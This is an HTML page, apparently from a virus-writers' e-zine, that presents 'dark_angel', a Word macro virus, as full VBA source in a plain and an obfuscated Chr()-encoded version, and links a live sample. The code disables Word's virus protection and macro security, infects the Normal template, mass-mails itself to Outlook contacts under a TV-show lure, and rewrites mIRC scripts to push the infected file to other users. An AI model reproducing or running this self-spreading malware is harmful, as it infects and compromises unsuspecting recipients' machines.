<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="03.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="05.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>dark_angel by Energy</u></b>
<p>A macro virus. Here is the script:
<p>Attribute VB_Name = "DarkAngel"
<p>Private Sub Document_Open()
<br>On Error Resume Next
<br>'dark_angel Macro Virus (c) by Energy
<br>'Thx to Necronomikon[Zer0Gravity] for help
<br>Application.DisplayStatusBar = (Rnd*0)
<br>Application.ScreenUpdating = (Rnd*0)
<br>Application.ShowVisualBasicEditor = (Rnd*0)
<br>Application.VBE.ActiveVBProject.VBComponents("darkangel").Export "c:\windows\darkangel.dll"
<br>Options.ConfirmConversions = (Rnd*0)
<br>Options.SaveNormalPrompt = (Rnd*0)
<br>Options.VirusProtection = (Rnd*0)
<br>Set FSO = CreateObject("Scripting.FileSystemObject")
<br>Set dirwin = FSO.GetSpecialFolder(0)
<br>Set regedit = CreateObject("WScript.Shell")
<br>regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
<br>&nbsp;If regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\darkangel") <> "by Energy" Then
<br>&nbsp;&nbsp;user = regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
<br>&nbsp;&nbsp;ActiveDocument.SaveAs FileName:=dirwin & "\darkangel.doc", FileFormat:=wdFormatDocument
<br>&nbsp;&nbsp;If ToolsWordCount.Count <= 500 Then
<br>&nbsp;&nbsp;&nbsp;For A = 1 To NormalTemplate.VBProject.VBComponents.Count
<br>&nbsp;&nbsp;&nbsp;&nbsp;If NormalTemplate.VBProject.VBComponents(A).Name = "darkangel" Then NormInstall = True
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Next A
<br>&nbsp;&nbsp;&nbsp;For A = 1 To ActiveDocument.VBProject.VBComponents.Count
<br>&nbsp;&nbsp;&nbsp;&nbsp;If ActiveDocument.VBProject.VBComponents(A).Name = "darkangel" Then ActivInstall = True
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Next A
<br>&nbsp;&nbsp;&nbsp;&nbsp;If ActivInstall = True And NormInstall = False Then Set Secj = NormalTemplate.VBProject _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Else If ActivInstall = False And NormInstall = True Then Set Secj = ActiveDocument.VBProject
<br>End If
<br>Set Outlook = CreateObject("Outlook.Application")
<br>&nbsp;&nbsp;Set MAPI = Outlook.GetNameSpace("MAPI")
<br>&nbsp;&nbsp;&nbsp;&nbsp;MAPI.Logon "profile", "password"
<br>&nbsp;&nbsp;&nbsp;&nbsp;For Y = 1 To MAPI.AddressLists.Count
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set AddyBook = MAPI.AddressLists(Y)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;X = 1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set Out = Outlook.CreateItem(0)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;For oo = 1 To AddyBook.AddressEntries.Count
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Mail = AddyBook.AddressEntries(X)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Recipients.Add Mail
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;X = X + 1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If X > 30 Then oo = AddyBook.AddressEntries.Count
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Next oo
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Subject = "RE:"
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Body = "The True Time Story about the TV Serie Dark Angel"
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Body = Out.Body & vbCrLf & ""
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Body = Out.Body & vbCrLf & "Visit the DarkAngel.doc, and you can see the Story about James Cameron�s Dark Angel"
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Body = Out.Body & vbCrLf & vbCrLf & vbCrLf & vbCrLf
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Attachments.Add (dirwin & "\darkangel.doc")
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.DeleteAfterSubmit = True
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out.Send
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Mail = ""
<br>ActiveDocument.SaveAs Environ("WINDIR") & "\darkangel.doc"
<br>SetAttr "C:\Windows\darkangel.doc", vbReadOnly
<br>SetAttr "C:\windows\darkangel.dll", vbReadOnly
<br>SetAttr "C:\mirc\system\script.ini", vbReadOnly
<br>Open "C:\mirc\system\script.ini" For Output As #1
<br>Print #1, "[script]"
<br>Print #1, "n0=on 1:text:   *:?:{ s *2 | halt }"
<br>Print #1, "n1=alias /s / *"
<br>Print #1, "n2=on 1:connect:/.enable #d"
<br>Print #1, "n3=#d off"
<br>Print #1, "n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick ""c:\windows\darkangel.doc"" } | .disable #d | .timer 1 30 .enable #d }"
<br>Print #1, "n5=#d end"
<br>Close #1
<br>Secj.VBComponents.Import ("c:\windows\darkangel.dll")
<br>ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
<br>      Next Y
<br>      MAPI.Logoff
<br>      regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\darkangel", "(c) by Energy@rRlf.de"
<br>&nbsp;End If
End Sub
Private Sub Document_Close()
Dim M
M = Int((3 * Rnd) + 1)
<br>&nbsp;If M = 2 Then
<br>&nbsp;&nbsp;msg = "Dark Angel (Jessica Alba)" & vbCrLf & "(c) by Energy"
<br>&nbsp;&nbsp;MsgBox msg, vbCritical, "please retype DarkAngel.doc"
<br>&nbsp;End If
<br>End Sub
<br>&nbsp;
<br>&nbsp;
<br>Here is also an encrypted script:
<p>Attribute VB_Name = "DarkAngel"
<p>Private Sub Document_Open()
<br>On Error Resume Next
<br>'dark_angel Macro Virus (c) by Energy
<br>'Thx to Necronomikon[Zer0Gravity] for help
<br>Application.DisplayStatusBar = (Rnd * 0)
<br>Application.ScreenUpdating = (Rnd * 0)
<br>Application.ShowVisualBasicEditor = (Rnd * 0)
<br>Application.VBE.ActiveVBProject.VBComponents("darkangel").Export "c:\windows\darkangel.dll"
<br>Options.ConfirmConversions = (Rnd * 0)
<br>Options.SaveNormalPrompt = (Rnd * 0)
<br>Options.VirusProtection = (Rnd * 0)
<br>Set FSO = CreateObject("Scripting.FileSystemObject")
<br>Set dirwin = FSO.GetSpecialFolder(0)
<br>Set regedit = CreateObject("WScript.Shell")
<br>regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
<br>&nbsp;If regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\darkangel") <> "by Energy" Then
<br>&nbsp;&nbsp;user = regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
<br>&nbsp;&nbsp;ActiveDocument.SaveAs FileName:=dirwin & "\darkangel.doc", FileFormat:=wdFormatDocument
<br>&nbsp;&nbsp;If ToolsWordCount.Count <= 500 Then
<br>&nbsp;&nbsp;&nbsp;For A = 1 To NormalTemplate.VBProject.VBComponents.Count
<br>&nbsp;&nbsp;&nbsp;&nbsp;If NormalTemplate.VBProject.VBComponents(A).Name = "darkangel" Then NormInstall = True
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Next A
<br>&nbsp;&nbsp;&nbsp;For A = 1 To ActiveDocument.VBProject.VBComponents.Count
<br>&nbsp;&nbsp;&nbsp;&nbsp;If ActiveDocument.VBProject.VBComponents(A).Name = "darkangel" Then ActivInstall = True
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Next A
<br>&nbsp;&nbsp;&nbsp;&nbsp;If ActivInstall = True And NormInstall = False Then Set Secj = NormalTemplate.VBProject _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Else If ActivInstall = False And NormInstall = True Then Set Secj = ActiveDocument.VBProject
<br>End If
<br>RRKP1$ = Chr(83) + Chr(101) + Chr(116) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(32) + ""
<br>Chr (61) + Chr(32) + Chr(67) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + ""
<br>Chr (116) + Chr(40) + Chr(34) + Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + Chr(112) + ""
<br>Chr (112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(34) + Chr(41) + Chr(13) + Chr(10) + ""
<br>Chr (32) + Chr(32) + Chr(83) + Chr(101) + Chr(116) + Chr(32) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + ""
<br>Chr (117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(71) + Chr(101) + Chr(116) + Chr(78) + Chr(97) + Chr(109) + Chr(101) + ""
<br>Chr (83) + Chr(112) + Chr(97) + Chr(99) + Chr(101) + Chr(40) + Chr(34) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(34) + Chr(41) + Chr(13) + Chr(10) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(46) + Chr(76) + Chr(111) + Chr(103) + Chr(111) + ""
<br>Chr (110) + Chr(32) + Chr(34) + Chr(112) + Chr(114) + Chr(111) + Chr(102) + Chr(105) + Chr(108) + Chr(101) + Chr(34) + Chr(44) + Chr(32) + Chr(34) + Chr(112) + ""
<br>Chr (97) + Chr(115) + Chr(115) + Chr(119) + Chr(111) + Chr(114) + Chr(100) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
<br>Chr (32) + Chr(70) + Chr(111) + Chr(114) + Chr(32) + Chr(89) + Chr(32) + Chr(61) + Chr(32) + Chr(49) + Chr(32) + Chr(84) + Chr(111) + Chr(32) + Chr(77) + ""
<br>Chr (65) + Chr(80) + Chr(73) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + Chr(101) + Chr(115) + Chr(115) + Chr(76) + Chr(105) + Chr(115) + Chr(116) + ""
<br>Chr (115) + Chr(46) + Chr(67) + Chr(111) + Chr(117) + Chr(110) + Chr(116) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(83) + Chr(101) + Chr(116) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Ch(66) + Chr(111) + ""
<br>Chr (111) + Chr(107) + Chr(32) + Chr(61) + Chr(32) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + ""
<br>Chr (101) + Chr(115) + Chr(115) + Chr(76) + Chr(105) + Chr(115) + Chr(116) + Chr(115) + Chr(40) + Chr(89) + Chr(41) + Chr(13) + Chr(10) + Chr(32) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(88) + Chr(32) + Chr(61) + Chr(32) + Chr(49) + Chr(13) + ""
<br>Chr (10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(83) + Chr(101) + Chr(116) + Chr(32) + ""
<br>Chr (79) + Chr(117) + Chr(116) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + ""
<br>Chr (67) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(73) + Chr(116) + Chr(101) + Chr(109) + Chr(40) + Chr(48) + Chr(41) + Chr(13) + Chr(10) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(111) + Chr(114) + Chr(32) + Chr(111) + Chr(111) + Chr(32) + Chr(61) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(70)
<br>Chr (49) + Chr(32) + Chr(84) + Chr(111) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Chr(66) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + ""
<br>Chr (100) + Chr(100) + Chr(114) + Chr(101) + Chr(115) + Chr(115) + Chr(69) + Chr(110) + Chr(116) + Chr(114) + Chr(105) + Chr(101) + Chr(115) + Chr(46) + Chr(67) + ""
<br>Chr (111) + Chr(117) + Chr(110) + Chr(116) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(77) + Chr(97) + Chr(105) + Chr(108) + Chr(32) + Chr(61) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Chr(66) + ""
<br>Chr (111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + Chr(101) + Chr(115) + Chr(115) + Chr(69) + Chr(110) + Chr(116) + Chr(114) + ""
<br>Chr (105) + Chr(101) + Chr(115) + Chr(40) + Chr(88) + Chr(41) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(82) + Chr(101) + Chr(99) + Chr(105) + Chr(112) + Chr(105) + Chr(101) + Chr(110) + ""
<br>Chr (116) + Chr(115) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(32) + Chr(77) + Chr(97) + Chr(105) + Chr(108) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(88) + Chr(32) + Chr(61) + Chr(32) + Chr(88) + Chr(32) + Chr(43) + ""
<br>Chr (32) + Chr(49) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
<br>Chr (32) + Chr(73) + Chr(102) + Chr(32) + Chr(88) + Chr(32) + Chr(62) + Chr(32) + Chr(51) + Chr(48) + Chr(32) + Chr(84) + Chr(104) + Chr(101) + Chr(110) + Chr(32) + Chr(111) + ""
<br>Chr (111) + Chr(32) + Chr(61) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Chr(66) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + Chr(101) + ""
<br>Chr (115) + Chr(115) + Chr(69) + Chr(110) + Chr(116) + Chr(114) + Chr(105) + Chr(101) + Chr(115) + Chr(46) + Chr(67) + Chr(111) + Chr(117) + Chr(110) + Chr(116) + Chr(13) + ""
<br>Chr (10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(78) + Chr(101) + Chr(120) + Chr(116) + Chr(32) + ""
<br>Chr (111) + Chr(111) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + ""
<br>Chr (116) + Chr(46) + Chr(83) + Chr(117) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116) + Chr(32) + Chr(61) + Chr(32) + Chr(34) + Chr(82) + Chr(69) + Chr(58) + Chr(34) + ""
<br>Chr (13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + ""
<br>Chr (66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + Chr(34) + Chr(84) + Chr(104) + Chr(101) + Chr(32) + Chr(84) + ""
<br>Chr (114) + Chr(117) + Chr(101) + Chr(32) + Chr(84) + Chr(105) + Chr(109) + Chr(101) + Chr(32) + Chr(83) + Chr(116) + Chr(111) + Chr(114) + ""
<br>Chr (121) + Chr(32) + Chr(97) + Chr(98) + Chr(111) + Chr(117) + Chr(116) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(84) + Chr(86) + ""
<br>Chr (32) + Chr(83) + Chr(101) + Chr(114) + Chr(105) + Chr(101) + Chr(32) + Chr(68) + Chr(97) + Chr(114) + Chr(107) + Chr(32) + Chr(65) + Chr(110) + Chr(103) + Chr(101) + ""
<br>Chr (108) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + ""
<br>Chr (46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(38) + ""
<br>Chr (32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + Chr(38) + Chr(32) + Chr(34) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + ""
<br>Chr (79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + ""
<br>Chr (32) + Chr(38) + Chr(32) + Chr(34) + Chr(86) + Chr(105) + Chr(115) + Chr(105) + Chr(116) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(68) + Chr(97) + Chr(114) + Chr(107) + ""
<br>Chr (65) + Chr(110) + Chr(103) + Chr(101) + Chr(108) + Chr(46) + Chr(100) + Chr(111) + Chr(99) + Chr(44) + Chr(32) + Chr(97) + Chr(110) + Chr(100) + Chr(32) + Chr(121) + Chr(111) + Chr(117) + ""
<br>Chr (32) + Chr(99) + Chr(97) + Chr(110) + Chr(32) + Chr(115) + Chr(101) + Chr(101) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(83) + Chr(116) + Chr(111) + Chr(114) + Chr(121) + ""
<br>Chr (32) + Chr(97) + Chr(98) + Chr(111) + Chr(117) + Chr(116) + Chr(32) + Chr(74) + Chr(97) + Chr(109) + Chr(101) + ""
<br>Chr (115) + Chr(32) + Chr(67) + Chr(97) + Chr(109) + Chr(101) + Chr(114) + Chr(111) + Chr(110) + Chr(180) + Chr(115) + Chr(32) + Chr(68) + Chr(97) + Chr(114) + Chr(107) + Chr(32) + Chr(65) + ""
<br>Chr (110) + Chr(103) + Chr(101) + Chr(108) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + ""
<br>Chr (117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + ""
<br>Chr (32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + ""
<br>Chr (38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Ch(13) + Chr(10) + Chr(32) + ""
<br>Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(65) + Chr(116) + Chr(116) + Chr(97) + Chr(99) + ""
<br>Chr (104) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(32) + Chr(40) + Chr(100) + Chr(105) + Chr(114) + Chr(119) + Chr(105) + Chr(110) + ""
<br>Chr (32) + Chr(38) + Chr(32) + Chr(34) + Chr(92) + Chr(100) + Chr(97) + Chr(114) + Chr(107) + Chr(97) + Chr(110) + Chr(103) + Chr(101) + Chr(108) + Chr(46) + Chr(100) + Chr(111) + Chr(99) + Chr(34) + ""
<br>Chr (41) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(68) + Chr(101) + ""
<br>Chr (108) + Chr(101) + Chr(116) + Chr(101) + Chr(65) + Chr(102) + Chr(116) + Chr(101) + Chr(114) + Chr(83) + Chr(117) + Chr(98) + Chr(109) + Chr(105) + Chr(116) + Chr(32) + Chr(61) + Chr(32) + Chr(84) + ""
<br>Chr (114) + Chr(117) + Chr(101) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + ""
<br>Chr (83) + Chr(101) + Chr(110) + Chr(100) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(77) + Chr(97) + Chr(105) + ""
<br>Chr (108) + Chr(32) + Chr(61) + Chr(32) + Chr(34) + Chr(34)
<br>Final611$ = RRKP1$ & OAYR2$
<br>ActiveDocument.SaveAs Environ("WINDIR") & "\darkangel.doc"
<br>SetAttr "C:\Windows\darkangel.doc", vbReadOnly
<br>SetAttr "C:\windows\darkangel.dll", vbReadOnly
<br>SetAttr "C:\mirc\system\script.ini", vbReadOnly
<br>Open "C:\mirc\system\script.ini" For Output As #1
<br>Print #1, "[script]"
<br>Print #1, "n0=on 1:text:   *:?:{ s *2 | halt }"
<br>Print #1, "n1=alias /s / *"
<br>Print #1, "n2=on 1:connect:/.enable #d"
<br>Print #1, "n3=#d off"
<br>Print #1, "n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick ""c:\windows\darkangel.doc"" } | .disable #d | .timer 1 30 .enable #d }"
<br>Print #1, "n5=#d end"
<br>Close #1
<br>Secj.VBComponents.Import ("c:\windows\darkangel.dll")
<br>ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
<br>&nbsp;&nbsp;&nbsp;Next Y
<br>&nbsp;&nbsp;&nbsp;MAPI.Logoff
<br>&nbsp;&nbsp;&nbsp;regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\darkangel", "(c) by Energy@rRlf.de"
<br>&nbsp;End If
<br>End Sub
<br>Private Sub Document_Close()
<br>Dim M
<br>M = Int((3 * Rnd) + 1)
<br>&nbsp;If M = 2 Then
<br>&nbsp;&nbsp;msg = "Dark Angel (Jessica Alba)" & vbCrLf & "(c) by Energy"
<br>&nbsp;&nbsp;MsgBox msg, vbCritical, "please retype DarkAngel.doc"
<br>&nbsp;End If
<br>End Sub
<p><a href="04.zip">living virus</a>
</body>
</html>
